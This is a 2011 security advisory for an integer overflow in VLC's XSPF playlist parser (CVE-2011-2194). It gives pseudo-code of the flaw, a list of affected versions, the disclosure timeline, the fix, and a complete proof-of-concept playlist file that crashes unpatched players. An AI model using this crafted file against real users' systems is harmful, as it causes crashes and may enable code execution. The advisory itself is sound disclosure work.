VLC XSPF Local File Integer Overflow Vulnerability (SS-2011-006)

Jul 22, 2011

  • Title: VLC XSPF Local File Integer Overflow Vulnerability
  • Version: 1.0
  • Issue type: Integer overflow
  • Affected vendor: VideoLAN
  • Release date: 22 July 2011
  • Discovered by: Rocco Calvi
  • Issue status: Patch available

Summary

VideoLAN’s VLC media player version 1.1.9 down to 0.8.5 suffers from an integer overflow resulting in a heap-based buffer overflow through the XSPF playlist file parser when opening crafted malicious playlist (.XSPF) files.

 

Description

The VLC XSPF file uses a tag (<vlc:id>) in the “Demuxers: Playlist” component, which accepts decimal values for the vlc:id. When entering a large value that is beyond the memory segment that is allocated for program data, the program crashes. For example, setting the <vlc:id> value to 1073741823 (<vlc:id>1073741823</vlc:id>) will result in a MEMORY ACCESS VIOLATION and the application will crash.

 

Untitled.png

VLC Media Player attempting to access memory address outside the segment

 

As the screenshot above demonstrates, we supply a large integer DEC value example (107374182) for the vlc:id in our specially crafted .xspf file. When the application handles our xspf file the integer value will be written into EDX register 3FFFFFFF. Therefore, as the counter increases and approaches the supplied value in the EDX register 3FFFFFFF, it will attempt to access an invalid memory address which is past the end of the memory segment. This results in a crash.

Below is a demonstration of the vulnerable code in pseudo-C:

do
{
__counter += 8;
mem->dword0 = 0;
mem->dword4 = 0;
mem->dword8 = 0;
mem->dwordC = 0;
mem->dword10 = 0;
mem->dword14 = 0;
mem->dword18 = 0;
mem->dword1C = 0;
++mem; <-- access violation when memory value is greater then memory segment
}
while ( __counter <= __controlled_value_edx );
   }
};

 

Impact

If an attacker is able to under allocate a controlled heap buffer via the integar overflow, then it is likely the vulnerability will lead to arbitrary code execution in the context of the application.

 

Affected products

VideoLAN VLC media player 1.1.9
VideoLAN VLC media player 1.1.8
VideoLAN VLC media player 1.1.7
VideoLAN VLC media player 1.1.6
VideoLAN VLC media player 1.1.5
VideoLAN VLC media player 1.1.3
VideoLAN VLC media player 1.1.2
VideoLAN VLC media player 1.1.1
VideoLAN VLC media player 1.1.0
VideoLAN VLC media player 1.0.4
VideoLAN VLC media player 1.1.4
VideoLAN VLC media player 1.1.4
VideoLAN VLC media player 1.1.3
VideoLAN VLC media player 1.1.2
VideoLAN VLC media player 1.1.1
VideoLAN VLC media player 1.1
VideoLAN VLC media player 1.0.6
VideoLAN VLC media player 1.0.5
VideoLAN VLC media player 1.0.3
VideoLAN VLC media player 1.0.2
VideoLAN VLC media player 1.0.1
VideoLAN VLC media player 1.0
VideoLAN VLC media player 0.9.9
VideoLAN VLC media player 0.9.8a
VideoLAN VLC media player 0.9.7
VideoLAN VLC media player 0.9.6
VideoLAN VLC media player 0.9.5
VideoLAN VLC media player 0.9.4
VideoLAN VLC media player 0.9.3
VideoLAN VLC media player 0.9.2
VideoLAN VLC media player 0.9.1
VideoLAN VLC media player 0.9
VideoLAN VLC media player 0.8.6 i
VideoLAN VLC media player 0.8.6 h
VideoLAN VLC media player 0.8.6 g
VideoLAN VLC media player 0.8.6f
VideoLAN VLC media player 0.8.6e
VideoLAN VLC media player 0.8.6 d
VideoLAN VLC media player 0.8.6c
VideoLAN VLC media player 0.8.6b
VideoLAN VLC media player 0.8.6a
VideoLAN VLC media player 0.8.6
+ Debian Linux 4.0 sparc
+ Debian Linux 4.0 s/390
+ Debian Linux 4.0 powerpc
+ Debian Linux 4.0 mipsel
+ Debian Linux 4.0 mips
+ Debian Linux 4.0 m68k
+ Debian Linux 4.0 ia-64
+ Debian Linux 4.0 ia-32
+ Debian Linux 4.0 hppa
+ Debian Linux 4.0 arm
+ Debian Linux 4.0 amd64
+ Debian Linux 4.0 alpha
+ Debian Linux 4.0

 

Proof of concept

<playlist version="1">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>file:///file.mp3</location>
      <duration>992</duration>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>1073741823</vlc:id>
      </extension>
    </track>
  </trackList>
  <extension application="http://www.videolan.org/vlc/playlist/0">
    <vlc:item tid="0"/>
  </extension>
</playlist>

 

Solution

VideoLAN have released VLC Media Player 1.1.10 which addresses this issue.

 

Response timeline

  • 03/06/2011 - Vendor notified.
  • 05/06/2011 - Vendor confirms issue presence.
  • 05/06/2011 - Stratsec confirms patch resolves issue.
  • 22/07/2011 - This advisory published.

References

  • Vendor advisory: http://www.videolan.org/security/sa1104.html
  • CVE item: CVE-2011-2194
  • VLC ID: VideoLAN-SA-110